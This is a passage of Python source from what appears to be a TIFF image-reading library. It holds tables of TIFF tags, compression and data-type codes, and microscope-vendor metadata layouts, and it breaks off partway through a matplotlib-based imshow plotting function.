1: 'minisblack',
2: 'rgb',
3: 'palette',
4: 'mask',
5: 'separated', # CMYK
6: 'ycbcr',
8: 'cielab',
9: 'icclab',
10: 'itulab',
32803: 'cfa', # Color Filter Array
32844: 'logl',
32845: 'logluv',
34892: 'linear_raw'
}
TIFF_COMPESSIONS = {
1: None,
2: 'ccittrle',
3: 'ccittfax3',
4: 'ccittfax4',
5: 'lzw',
6: 'ojpeg',
7: 'jpeg',
8: 'adobe_deflate',
9: 't85',
10: 't43',
32766: 'next',
32771: 'ccittrlew',
32773: 'packbits',
32809: 'thunderscan',
32895: 'it8ctpad',
32896: 'it8lw',
32897: 'it8mp',
32898: 'it8bl',
32908: 'pixarfilm',
32909: 'pixarlog',
32946: 'deflate',
32947: 'dcs',
34661: 'jbig',
34676: 'sgilog',
34677: 'sgilog24',
34712: 'jp2000',
34713: 'nef',
}
TIFF_DECOMPESSORS = {
None: lambda x: x,
'adobe_deflate': zlib.decompress,
'deflate': zlib.decompress,
'packbits': decodepackbits,
'lzw': decodelzw,
# 'jpeg': decodejpg
}
TIFF_DATA_TYPES = {
1: '1B', # BYTE 8-bit unsigned integer.
2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code;
# the last byte must be NULL (binary zero).
3: '1H', # SHORT 16-bit (2-byte) unsigned integer
4: '1I', # LONG 32-bit (4-byte) unsigned integer.
5: '2I', # RATIONAL Two LONGs: the first represents the numerator of
# a fraction; the second, the denominator.
6: '1b', # SBYTE An 8-bit signed (twos-complement) integer.
7: '1s', # UNDEFINED An 8-bit byte that may contain anything,
# depending on the definition of the field.
8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer.
9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer.
10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator
# of a fraction, the second the denominator.
11: '1f', # FLOAT Single precision (4-byte) IEEE format.
12: '1d', # DOUBLE Double precision (8-byte) IEEE format.
13: '1I', # IFD unsigned 4 byte IFD offset.
#14: '', # UNICODE
#15: '', # COMPLEX
16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff)
17: '1q', # SLONG8 signed 8 byte integer (BigTiff)
18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff)
}
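# The format strings above are combined with byte order and a count when
# unpacking tag values, e.g. struct.unpack('<2H', ...) for two SHORTs in a
# little-endian file (illustrative; the composition happens where tags are read).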
TIFF_SAMPLE_FORMATS = {
1: 'uint',
2: 'int',
3: 'float',
#4: 'void',
#5: 'complex_int',
6: 'complex',
}
TIFF_SAMPLE_DTYPES = {
('uint', 1): '?', # bitmap
('uint', 2): 'B',
('uint', 3): 'B',
('uint', 4): 'B',
('uint', 5): 'B',
('uint', 6): 'B',
('uint', 7): 'B',
('uint', 8): 'B',
('uint', 9): 'H',
('uint', 10): 'H',
('uint', 11): 'H',
('uint', 12): 'H',
('uint', 13): 'H',
('uint', 14): 'H',
('uint', 15): 'H',
('uint', 16): 'H',
('uint', 17): 'I',
('uint', 18): 'I',
('uint', 19): 'I',
('uint', 20): 'I',
('uint', 21): 'I',
('uint', 22): 'I',
('uint', 23): 'I',
('uint', 24): 'I',
('uint', 25): 'I',
('uint', 26): 'I',
('uint', 27): 'I',
('uint', 28): 'I',
('uint', 29): 'I',
('uint', 30): 'I',
('uint', 31): 'I',
('uint', 32): 'I',
('uint', 64): 'Q',
('int', 8): 'b',
('int', 16): 'h',
('int', 32): 'i',
('int', 64): 'q',
('float', 16): 'e',
('float', 32): 'f',
('float', 64): 'd',
('complex', 64): 'F',
('complex', 128): 'D',
('uint', (5, 6, 5)): 'B',
}
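# Example: TIFF_SAMPLE_DTYPES[('uint', 12)] == 'H', i.e. 12-bit samples
# are unpacked into 16-bit unsigned integers.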
TIFF_ORIENTATIONS = {
1: 'top_left',
2: 'top_right',
3: 'bottom_right',
4: 'bottom_left',
5: 'left_top',
6: 'right_top',
7: 'right_bottom',
8: 'left_bottom',
}
# TODO: is there a standard for character axes labels?
AXES_LABELS = {
'X': 'width',
'Y': 'height',
'Z': 'depth',
'S': 'sample', # rgb(a)
'I': 'series', # general sequence, plane, page, IFD
'T': 'time',
'C': 'channel', # color, emission wavelength
'A': 'angle',
'P': 'phase', # formerly F # P is Position in LSM!
'R': 'tile', # region, point, mosaic
'H': 'lifetime', # histogram
'E': 'lambda', # excitation wavelength
'L': 'exposure', # lux
'V': 'event',
'Q': 'other',
#'M': 'mosaic', # LSM 6
}
AXES_LABELS.update(dict((v, k) for k, v in AXES_LABELS.items()))
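# The mapping is now bidirectional, e.g. AXES_LABELS['X'] == 'width' and
# AXES_LABELS['width'] == 'X'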
# Map OME pixel types to numpy dtype
OME_PIXEL_TYPES = {
'int8': 'i1',
'int16': 'i2',
'int32': 'i4',
'uint8': 'u1',
'uint16': 'u2',
'uint32': 'u4',
'float': 'f4',
# 'bit': 'bit',
'double': 'f8',
'complex': 'c8',
'double-complex': 'c16',
}
# NIH Image PicHeader v1.63
NIH_IMAGE_HEADER = [
('fileid', 'a8'),
('nlines', 'i2'),
('pixelsperline', 'i2'),
('version', 'i2'),
('oldlutmode', 'i2'),
('oldncolors', 'i2'),
('colors', 'u1', (3, 32)),
('oldcolorstart', 'i2'),
('colorwidth', 'i2'),
('extracolors', 'u2', (6, 3)),
('nextracolors', 'i2'),
('foregroundindex', 'i2'),
('backgroundindex', 'i2'),
('xscale', 'f8'),
('_x0', 'i2'),
('_x1', 'i2'),
('units_t', 'i2'), # NIH_UNITS_TYPE
('p1', [('x', 'i2'), ('y', 'i2')]),
('p2', [('x', 'i2'), ('y', 'i2')]),
('curvefit_t', 'i2'), # NIH_CURVEFIT_TYPE
('ncoefficients', 'i2'),
('coeff', 'f8', 6),
('_um_len', 'u1'),
('um', 'a15'),
('_x2', 'u1'),
('binarypic', 'b1'),
('slicestart', 'i2'),
('sliceend', 'i2'),
('scalemagnification', 'f4'),
('nslices', 'i2'),
('slicespacing', 'f4'),
('currentslice', 'i2'),
('frameinterval', 'f4'),
('pixelaspectratio', 'f4'),
('colorstart', 'i2'),
('colorend', 'i2'),
('ncolors', 'i2'),
('fill1', '3u2'),
('fill2', '3u2'),
('colortable_t', 'u1'), # NIH_COLORTABLE_TYPE
('lutmode_t', 'u1'), # NIH_LUTMODE_TYPE
('invertedtable', 'b1'),
('zeroclip', 'b1'),
('_xunit_len', 'u1'),
('xunit', 'a11'),
('stacktype_t', 'i2'), # NIH_STACKTYPE_TYPE
]
NIH_COLORTABLE_TYPE = (
'CustomTable', 'AppleDefault', 'Pseudo20', 'Pseudo32', 'Rainbow',
'Fire1', 'Fire2', 'Ice', 'Grays', 'Spectrum')
NIH_LUTMODE_TYPE = (
'PseudoColor', 'OldAppleDefault', 'OldSpectrum', 'GrayScale',
'ColorLut', 'CustomGrayscale')
NIH_CURVEFIT_TYPE = (
'StraightLine', 'Poly2', 'Poly3', 'Poly4', 'Poly5', 'ExpoFit',
'PowerFit', 'LogFit', 'RodbardFit', 'SpareFit1', 'Uncalibrated',
'UncalibratedOD')
NIH_UNITS_TYPE = (
'Nanometers', 'Micrometers', 'Millimeters', 'Centimeters', 'Meters',
'Kilometers', 'Inches', 'Feet', 'Miles', 'Pixels', 'OtherUnits')
NIH_STACKTYPE_TYPE = (
'VolumeStack', 'RGBStack', 'MovieStack', 'HSVStack')
# Map Universal Imaging Corporation MetaMorph internal tag ids to name and type
UIC_TAGS = {
0: ('auto_scale', int),
1: ('min_scale', int),
2: ('max_scale', int),
3: ('spatial_calibration', int),
4: ('x_calibration', Fraction),
5: ('y_calibration', Fraction),
6: ('calibration_units', str),
7: ('name', str),
8: ('thresh_state', int),
9: ('thresh_state_red', int),
10: ('tagid_10', None), # undefined
11: ('thresh_state_green', int),
12: ('thresh_state_blue', int),
13: ('thresh_state_lo', int),
14: ('thresh_state_hi', int),
15: ('zoom', int),
16: ('create_time', julian_datetime),
17: ('last_saved_time', julian_datetime),
18: ('current_buffer', int),
19: ('gray_fit', None),
20: ('gray_point_count', None),
21: ('gray_x', Fraction),
22: ('gray_y', Fraction),
23: ('gray_min', Fraction),
24: ('gray_max', Fraction),
25: ('gray_unit_name', str),
26: ('standard_lut', int),
27: ('wavelength', int),
28: ('stage_position', '(%i,2,2)u4'), # N xy positions as fractions
29: ('camera_chip_offset', '(%i,2,2)u4'), # N xy offsets as fractions
30: ('overlay_mask', None),
31: ('overlay_compress', None),
32: ('overlay', None),
33: ('special_overlay_mask', None),
34: ('special_overlay_compress', None),
35: ('special_overlay', None),
36: ('image_property', read_uic_image_property),
37: ('stage_label', '%ip'), # N str
38: ('autoscale_lo_info', Fraction),
39: ('autoscale_hi_info', Fraction),
40: ('absolute_z', '(%i,2)u4'), # N fractions
41: ('absolute_z_valid', '(%i,)u4'), # N long
42: ('gamma', int),
43: ('gamma_red', int),
44: ('gamma_green', int),
45: ('gamma_blue', int),
46: ('camera_bin', int),
47: ('new_lut', int),
48: ('image_property_ex', None),
49: ('plane_property', int),
50: ('user_lut_table', '(256,3)u1'),
51: ('red_autoscale_info', int),
52: ('red_autoscale_lo_info', Fraction),
53: ('red_autoscale_hi_info', Fraction),
54: ('red_minscale_info', int),
55: ('red_maxscale_info', int),
56: ('green_autoscale_info', int),
57: ('green_autoscale_lo_info', Fraction),
58: ('green_autoscale_hi_info', Fraction),
59: ('green_minscale_info', int),
60: ('green_maxscale_info', int),
61: ('blue_autoscale_info', int),
62: ('blue_autoscale_lo_info', Fraction),
63: ('blue_autoscale_hi_info', Fraction),
64: ('blue_min_scale_info', int),
65: ('blue_max_scale_info', int),
#66: ('overlay_plane_color', read_uic_overlay_plane_color),
}
# Olympus FluoView
MM_DIMENSION = [
('name', 'a16'),
('size', 'i4'),
('origin', 'f8'),
('resolution', 'f8'),
('unit', 'a64'),
]
MM_HEADER = [
('header_flag', 'i2'),
('image_type', 'u1'),
('image_name', 'a257'),
('offset_data', 'u4'),
('palette_size', 'i4'),
('offset_palette0', 'u4'),
('offset_palette1', 'u4'),
('comment_size', 'i4'),
('offset_comment', 'u4'),
('dimensions', MM_DIMENSION, 10),
('offset_position', 'u4'),
('map_type', 'i2'),
('map_min', 'f8'),
('map_max', 'f8'),
('min_value', 'f8'),
('max_value', 'f8'),
('offset_map', 'u4'),
('gamma', 'f8'),
('offset', 'f8'),
('gray_channel', MM_DIMENSION),
('offset_thumbnail', 'u4'),
('voice_field', 'i4'),
('offset_voice_field', 'u4'),
]
# Carl Zeiss LSM
CZ_LSM_INFO = [
('magic_number', 'u4'),
('structure_size', 'i4'),
('dimension_x', 'i4'),
('dimension_y', 'i4'),
('dimension_z', 'i4'),
('dimension_channels', 'i4'),
('dimension_time', 'i4'),
('data_type', 'i4'), # CZ_DATA_TYPES
('thumbnail_x', 'i4'),
('thumbnail_y', 'i4'),
('voxel_size_x', 'f8'),
('voxel_size_y', 'f8'),
('voxel_size_z', 'f8'),
('origin_x', 'f8'),
('origin_y', 'f8'),
('origin_z', 'f8'),
('scan_type', 'u2'),
('spectral_scan', 'u2'),
('type_of_data', 'u4'), # CZ_TYPE_OF_DATA
('offset_vector_overlay', 'u4'),
('offset_input_lut', 'u4'),
('offset_output_lut', 'u4'),
('offset_channel_colors', 'u4'),
('time_interval', 'f8'),
('offset_channel_data_types', 'u4'),
('offset_scan_info', 'u4'), # CZ_LSM_SCAN_INFO
('offset_ks_data', 'u4'),
('offset_time_stamps', 'u4'),
('offset_event_list', 'u4'),
('offset_roi', 'u4'),
('offset_bleach_roi', 'u4'),
('offset_next_recording', 'u4'),
# LSM 2.0 ends here
('display_aspect_x', 'f8'),
('display_aspect_y', 'f8'),
('display_aspect_z', 'f8'),
('display_aspect_time', 'f8'),
('offset_mean_of_roi_overlay', 'u4'),
('offset_topo_isoline_overlay', 'u4'),
('offset_topo_profile_overlay', 'u4'),
('offset_linescan_overlay', 'u4'),
('offset_toolbar_flags', 'u4'),
('offset_channel_wavelength', 'u4'),
('offset_channel_factors', 'u4'),
('objective_sphere_correction', 'f8'),
('offset_unmix_parameters', 'u4'),
# LSM 3.2, 4.0 end here
('offset_acquisition_parameters', 'u4'),
('offset_characteristics', 'u4'),
('offset_palette', 'u4'),
('time_difference_x', 'f8'),
('time_difference_y', 'f8'),
('time_difference_z', 'f8'),
('internal_use_1', 'u4'),
('dimension_p', 'i4'),
('dimension_m', 'i4'),
('dimensions_reserved', '16i4'),
('offset_tile_positions', 'u4'),
('reserved_1', '9u4'),
('offset_positions', 'u4'),
('reserved_2', '21u4'), # must be 0
]
# Import functions for LSM_INFO sub-records
CZ_LSM_INFO_READERS = {
'scan_info': read_cz_lsm_scan_info,
'time_stamps': read_cz_lsm_time_stamps,
'event_list': read_cz_lsm_event_list,
'channel_colors': read_cz_lsm_floatpairs,
'positions': read_cz_lsm_floatpairs,
'tile_positions': read_cz_lsm_floatpairs,
}
# Map cz_lsm_info.scan_type to dimension order
CZ_SCAN_TYPES = {
0: 'XYZCT', # x-y-z scan
1: 'XYZCT', # z scan (x-z plane)
2: 'XYZCT', # line scan
3: 'XYTCZ', # time series x-y
4: 'XYZTC', # time series x-z
5: 'XYTCZ', # time series 'Mean of ROIs'
6: 'XYZTC', # time series x-y-z
7: 'XYCTZ', # spline scan
8: 'XYCZT', # spline scan x-z
9: 'XYTCZ', # time series spline plane x-z
10: 'XYZCT', # point mode
}
# Map dimension codes to cz_lsm_info attribute
CZ_DIMENSIONS = {
'X': 'dimension_x',
'Y': 'dimension_y',
'Z': 'dimension_z',
'C': 'dimension_channels',
'T': 'dimension_time',
}
# Description of cz_lsm_info.data_type
CZ_DATA_TYPES = {
0: 'varying data types',
1: '8 bit unsigned integer',
2: '12 bit unsigned integer',
5: '32 bit float',
}
# Description of cz_lsm_info.type_of_data
CZ_TYPE_OF_DATA = {
0: 'Original scan data',
1: 'Calculated data',
2: '3D reconstruction',
3: 'Topography height map',
}
CZ_LSM_SCAN_INFO_ARRAYS = {
0x20000000: "tracks",
0x30000000: "lasers",
0x60000000: "detection_channels",
0x80000000: "illumination_channels",
0xa0000000: "beam_splitters",
0xc0000000: "data_channels",
0x11000000: "timers",
0x13000000: "markers",
}
CZ_LSM_SCAN_INFO_STRUCTS = {
# 0x10000000: "recording",
0x40000000: "track",
0x50000000: "laser",
0x70000000: "detection_channel",
0x90000000: "illumination_channel",
0xb0000000: "beam_splitter",
0xd0000000: "data_channel",
0x12000000: "timer",
0x14000000: "marker",
}
CZ_LSM_SCAN_INFO_ATTRIBUTES = {
# recording
0x10000001: "name",
0x10000002: "description",
0x10000003: "notes",
0x10000004: "objective",
0x10000005: "processing_summary",
0x10000006: "special_scan_mode",
0x10000007: "scan_type",
0x10000008: "scan_mode",
0x10000009: "number_of_stacks",
0x1000000a: "lines_per_plane",
0x1000000b: "samples_per_line",
0x1000000c: "planes_per_volume",
0x1000000d: "images_width",
0x1000000e: "images_height",
0x1000000f: "images_number_planes",
0x10000010: "images_number_stacks",
0x10000011: "images_number_channels",
0x10000012: "linscan_xy_size",
0x10000013: "scan_direction",
0x10000014: "time_series",
0x10000015: "original_scan_data",
0x10000016: "zoom_x",
0x10000017: "zoom_y",
0x10000018: "zoom_z",
0x10000019: "sample_0x",
0x1000001a: "sample_0y",
0x1000001b: "sample_0z",
0x1000001c: "sample_spacing",
0x1000001d: "line_spacing",
0x1000001e: "plane_spacing",
0x1000001f: "plane_width",
0x10000020: "plane_height",
0x10000021: "volume_depth",
0x10000023: "nutation",
0x10000034: "rotation",
0x10000035: "precession",
0x10000036: "sample_0time",
0x10000037: "start_scan_trigger_in",
0x10000038: "start_scan_trigger_out",
0x10000039: "start_scan_event",
0x10000040: "start_scan_time",
0x10000041: "stop_scan_trigger_in",
0x10000042: "stop_scan_trigger_out",
0x10000043: "stop_scan_event",
0x10000044: "stop_scan_time",
0x10000045: "use_rois",
0x10000046: "use_reduced_memory_rois",
0x10000047: "user",
0x10000048: "use_bc_correction",
0x10000049: "position_bc_correction1",
0x10000050: "position_bc_correction2",
0x10000051: "interpolation_y",
0x10000052: "camera_binning",
0x10000053: "camera_supersampling",
0x10000054: "camera_frame_width",
0x10000055: "camera_frame_height",
0x10000056: "camera_offset_x",
0x10000057: "camera_offset_y",
0x10000059: "rt_binning",
0x1000005a: "rt_frame_width",
0x1000005b: "rt_frame_height",
0x1000005c: "rt_region_width",
0x1000005d: "rt_region_height",
0x1000005e: "rt_offset_x",
0x1000005f: "rt_offset_y",
0x10000060: "rt_zoom",
0x10000061: "rt_line_period",
0x10000062: "prescan",
0x10000063: "scan_direction_z",
# track
0x40000001: "multiplex_type", # 0 after line; 1 after frame
0x40000002: "multiplex_order",
0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average
0x40000004: "sampling_method", # 1 mean; 2 sum
0x40000005: "sampling_number",
0x40000006: "acquire",
0x40000007: "sample_observation_time",
0x4000000b: "time_between_stacks",
0x4000000c: "name",
0x4000000d: "collimator1_name",
0x4000000e: "collimator1_position",
0x4000000f: "collimator2_name",
0x40000010: "collimator2_position",
0x40000011: "is_bleach_track",
0x40000012: "is_bleach_after_scan_number",
0x40000013: "bleach_scan_number",
0x40000014: "trigger_in",
0x40000015: "trigger_out",
0x40000016: "is_ratio_track",
0x40000017: "bleach_count",
0x40000018: "spi_center_wavelength",
0x40000019: "pixel_time",
0x40000021: "condensor_frontlens",
0x40000023: "field_stop_value",
0x40000024: "id_condensor_aperture",
0x40000025: "condensor_aperture",
0x40000026: "id_condensor_revolver",
0x40000027: "condensor_filter",
0x40000028: "id_transmission_filter1",
0x40000029: "id_transmission1",
0x40000030: "id_transmission_filter2",
0x40000031: "id_transmission2",
0x40000032: "repeat_bleach",
0x40000033: "enable_spot_bleach_pos",
0x40000034: "spot_bleach_posx",
0x40000035: "spot_bleach_posy",
0x40000036: "spot_bleach_posz",
0x40000037: "id_tubelens",
0x40000038: "id_tubelens_position",
0x40000039: "transmitted_light",
0x4000003a: "reflected_light",
0x4000003b: "simultan_grab_and_bleach",
0x4000003c: "bleach_pixel_time",
# laser
0x50000001: "name",
0x50000002: "acquire",
0x50000003: "power",
# detection_channel
0x70000001: "integration_mode",
0x70000002: "special_mode",
0x70000003: "detector_gain_first",
0x70000004: "detector_gain_last",
0x70000005: "amplifier_gain_first",
0x70000006: "amplifier_gain_last",
0x70000007: "amplifier_offs_first",
0x70000008: "amplifier_offs_last",
0x70000009: "pinhole_diameter",
0x7000000a: "counting_trigger",
0x7000000b: "acquire",
0x7000000c: "point_detector_name",
0x7000000d: "amplifier_name",
0x7000000e: "pinhole_name",
0x7000000f: "filter_set_name",
0x70000010: "filter_name",
0x70000013: "integrator_name",
0x70000014: "channel_name",
0x70000015: "detector_gain_bc1",
0x70000016: "detector_gain_bc2",
0x70000017: "amplifier_gain_bc1",
0x70000018: "amplifier_gain_bc2",
0x70000019: "amplifier_offset_bc1",
0x70000020: "amplifier_offset_bc2",
0x70000021: "spectral_scan_channels",
0x70000022: "spi_wavelength_start",
0x70000023: "spi_wavelength_stop",
0x70000026: "dye_name",
0x70000027: "dye_folder",
# illumination_channel
0x90000001: "name",
0x90000002: "power",
0x90000003: "wavelength",
0x90000004: "aquire",
0x90000005: "detchannel_name",
0x90000006: "power_bc1",
0x90000007: "power_bc2",
# beam_splitter
0xb0000001: "filter_set",
0xb0000002: "filter",
0xb0000003: "name",
# data_channel
0xd0000001: "name",
0xd0000003: "acquire",
0xd0000004: "color",
0xd0000005: "sample_type",
0xd0000006: "bits_per_sample",
0xd0000007: "ratio_type",
0xd0000008: "ratio_track1",
0xd0000009: "ratio_track2",
0xd000000a: "ratio_channel1",
0xd000000b: "ratio_channel2",
0xd000000c: "ratio_const1",
0xd000000d: "ratio_const2",
0xd000000e: "ratio_const3",
0xd000000f: "ratio_const4",
0xd0000010: "ratio_const5",
0xd0000011: "ratio_const6",
0xd0000012: "ratio_first_images1",
0xd0000013: "ratio_first_images2",
0xd0000014: "dye_name",
0xd0000015: "dye_folder",
0xd0000016: "spectrum",
0xd0000017: "acquire",
# timer
0x12000001: "name",
0x12000002: "description",
0x12000003: "interval",
0x12000004: "trigger_in",
0x12000005: "trigger_out",
0x12000006: "activation_time",
0x12000007: "activation_number",
# marker
0x14000001: "name",
0x14000002: "description",
0x14000003: "trigger_in",
0x14000004: "trigger_out",
}
# Map TIFF tag code to attribute name, default value, type, count, validator
TIFF_TAGS = {
254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()),
255: ('subfile_type', None, 3, 1,
{0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}),
256: ('image_width', None, 4, 1, None),
257: ('image_length', None, 4, 1, None),
258: ('bits_per_sample', 1, 3, 1, None),
259: ('compression', 1, 3, 1, TIFF_COMPESSIONS),
262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS),
266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}),
269: ('document_name', None, 2, None, None),
270: ('image_description', None, 2, None, None),
271: ('make', None, 2, None, None),
272: ('model', None, 2, None, None),
273: ('strip_offsets', None, 4, None, None),
274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS),
277: ('samples_per_pixel', 1, 3, 1, None),
278: ('rows_per_strip', 2**32-1, 4, 1, None),
279: ('strip_byte_counts', None, 4, None, None),
280: ('min_sample_value', None, 3, None, None),
281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample
282: ('x_resolution', None, 5, 1, None),
283: ('y_resolution', None, 5, 1, None),
284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}),
285: ('page_name', None, 2, None, None),
286: ('x_position', None, 5, 1, None),
287: ('y_position', None, 5, 1, None),
296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}),
297: ('page_number', None, 3, 2, None),
305: ('software', None, 2, None, None),
306: ('datetime', None, 2, None, None),
315: ('artist', None, 2, None, None),
316: ('host_computer', None, 2, None, None),
317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}),
318: ('white_point', None, 5, 2, None),
319: ('primary_chromaticities', None, 5, 6, None),
320: ('color_map', None, 3, None, None),
322: ('tile_width', None, 4, 1, None),
323: ('tile_length', None, 4, 1, None),
324: ('tile_offsets', None, 4, None, None),
325: ('tile_byte_counts', None, 4, None, None),
338: ('extra_samples', None, 3, None,
{0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}),
339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS),
340: ('smin_sample_value', None, None, None, None),
341: ('smax_sample_value', None, None, None, None),
347: ('jpeg_tables', None, 7, None, None),
530: ('ycbcr_subsampling', 1, 3, 2, None),
531: ('ycbcr_positioning', 1, 3, 1, None),
    32995: ('sgi_matteing', None, None, 1, None), # use extra_samples
32996: ('sgi_datatype', None, None, 1, None), # use sample_format
32997: ('image_depth', None, 4, 1, None),
32998: ('tile_depth', None, 4, 1, None),
33432: ('copyright', None, 1, None, None),
33445: ('md_file_tag', None, 4, 1, None),
33446: ('md_scale_pixel', None, 5, 1, None),
33447: ('md_color_table', None, 3, None, None),
33448: ('md_lab_name', None, 2, None, None),
33449: ('md_sample_info', None, 2, None, None),
33450: ('md_prep_date', None, 2, None, None),
33451: ('md_prep_time', None, 2, None, None),
33452: ('md_file_units', None, 2, None, None),
33550: ('model_pixel_scale', None, 12, 3, None),
33922: ('model_tie_point', None, 12, None, None),
34665: ('exif_ifd', None, None, 1, None),
34735: ('geo_key_directory', None, 3, None, None),
34736: ('geo_double_params', None, 12, None, None),
34737: ('geo_ascii_params', None, 2, None, None),
34853: ('gps_ifd', None, None, 1, None),
37510: ('user_comment', None, None, None, None),
42112: ('gdal_metadata', None, 2, None, None),
42113: ('gdal_nodata', None, 2, None, None),
50289: ('mc_xy_position', None, 12, 2, None),
50290: ('mc_z_position', None, 12, 1, None),
50291: ('mc_xy_calibration', None, 12, 3, None),
50292: ('mc_lens_lem_na_n', None, 12, 3, None),
50293: ('mc_channel_name', None, 1, None, None),
50294: ('mc_ex_wavelength', None, 12, 1, None),
50295: ('mc_time_stamp', None, 12, 1, None),
50838: ('imagej_byte_counts', None, None, None, None),
65200: ('flex_xml', None, 2, None, None),
# code: (attribute name, default value, type, count, validator)
}
# Map custom TIFF tag codes to attribute names and import functions
CUSTOM_TAGS = {
700: ('xmp', read_bytes),
34377: ('photoshop', read_numpy),
33723: ('iptc', read_bytes),
34675: ('icc_profile', read_bytes),
33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK
33629: ('uic2tag', read_uic2tag),
33630: ('uic3tag', read_uic3tag),
33631: ('uic4tag', read_uic4tag),
34361: ('mm_header', read_mm_header), # Olympus FluoView
34362: ('mm_stamp', read_mm_stamp),
34386: ('mm_user_block', read_bytes),
34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM
43314: ('nih_image_header', read_nih_image_header),
# 40001: ('mc_ipwinscal', read_bytes),
40100: ('mc_id_old', read_bytes),
50288: ('mc_id', read_bytes),
50296: ('mc_frame_properties', read_bytes),
50839: ('imagej_metadata', read_bytes),
51123: ('micromanager_metadata', read_json),
}
# Max line length of printed output
PRINT_LINE_LEN = 79
def imshow(data, title=None, vmin=0, vmax=None, cmap=None,
bitspersample=None, photometric='rgb', interpolation='nearest',
dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs):
"""Plot n-dimensional images using matplotlib.pyplot.
Return figure, subplot and plot axis.
Requires pyplot already imported ``from matplotlib import pyplot``.
Parameters
----------
bitspersample : int or None
Number of bits per channel in integer RGB images.
    photometric : {'miniswhite', 'minisblack', 'rgb', 'palette'}
The color space of the image data.
title : str
Window and subplot title.
    figure : matplotlib.figure.Figure (optional)
        Matplotlib figure to use for plotting.
subplot : int
A matplotlib.pyplot.subplot axis.
maxdim : int
        Maximum image size in any dimension.
kwargs : optional
Arguments for matplotlib.pyplot.imshow.
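    Examples
    --------
    Opens a GUI window, hence skipped under doctest:
    >>> data = numpy.random.rand(4, 301, 219)
    >>> imshow(data, title='random image')  # doctest: +SKIP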
"""
#if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'):
# raise ValueError("Can't handle %s photometrics" % photometric)
# TODO: handle photometric == 'separated' (CMYK)
isrgb = photometric in ('rgb', 'palette')
data = numpy.atleast_2d(data.squeeze())
data = data[(slice(0, maxdim), ) * len(data.shape)]
dims = data.ndim
if dims < 2:
raise ValueError("not an image")
elif dims == 2:
dims = 0
isrgb = False
else:
if isrgb and data.shape[-3] in (3, 4):
data = numpy.swapaxes(data, -3, -2)
data = numpy.swapaxes(data, -2, -1)
elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and
data.shape[-1] < data.shape[-3] // 16 and
data.shape[-1] < 5):
data = numpy.swapaxes(data, -3, -1)
data = numpy.swapaxes(data, -2, -1)
isrgb = isrgb and data.shape[-1] in (3, 4)
dims -= 3 if isrgb else 2
if photometric == 'palette' and isrgb:
datamax = data.max()
if datamax > 255:
data >>= 8 # possible precision loss
data = data.astype('B')
elif data.dtype.kind in 'ui':
if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None:
try:
bitspersample = int(math.ceil(math.log(data.max(), 2)))
except Exception:
bitspersample = data.dtype.itemsize * 8
elif not isinstance(bitspersample, int):
# bitspersample can be tuple, e.g. (5, 6, 5)
bitspersample = data.dtype.itemsize * 8
datamax = 2**bitspersample
if isrgb:
if bitspersample < 8:
data <<= 8 - bitspersample
elif bitspersample > 8:
data >>= bitspersample - 8 # precision loss
data = data.astype('B')
elif data.dtype.kind == 'f':
datamax = data.max()
if isrgb and datamax > 1.0:
if data.dtype.char == 'd':
data = data.astype('f')
data /= datamax
elif data.dtype.kind == 'b':
datamax = 1
elif data.dtype.kind == 'c':
raise NotImplementedError("complex type") # TODO: handle complex types
if not isrgb:
if vmax is None:
vmax = datamax
if vmin is None:
if data.dtype.kind == 'i':
dtmin = numpy.iinfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
                    vmin = numpy.min(data[data > dtmin])
if data.dtype.kind == 'f':
dtmin = numpy.finfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
                    vmin = numpy.min(data[data > dtmin])
else:
vmin = 0
pyplot = sys.modules['matplotlib.pyplot']
if figure is None:
pyplot.rc('font', family='sans-serif', weight='normal', size=8)
figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True,
facecolor='1.0', edgecolor='w')
try:
figure.canvas.manager.window.title(title)
except Exception:
pass
pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9,
left=0.1, right=0.95, hspace=0.05, wspace=0.0)
subplot = pyplot.subplot(subplot)
if title:
try:
title = unicode(title, 'Windows-1252')
except TypeError:
pass
pyplot.title(title, size=11)
if cmap is None:
if data.dtype.kind in 'ubf' or vmin == 0:
cmap = 'cubehelix'
else:
cmap = 'coolwarm'
if photometric == 'miniswhite':
cmap += '_r'
image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax,
cmap=cmap, interpolation=interpolation, **kwargs)
if not isrgb:
pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05
def format_coord(x, y):
# callback function to format coordinate display in toolbar
x = int(x + 0.5)
y = int(y + 0.5)
try:
if dims:
return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x],
current, x, y)
else:
return "%s @ [%4i, %4i]" % (data[y, x], x, y)
except IndexError:
return ""
pyplot.gca().format_coord = format_coord
if dims:
current = list((0, ) * dims)
cur_ax_dat = [0, data[tuple(current)].squeeze()]
sliders = [pyplot.Slider(
pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]),
'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5',
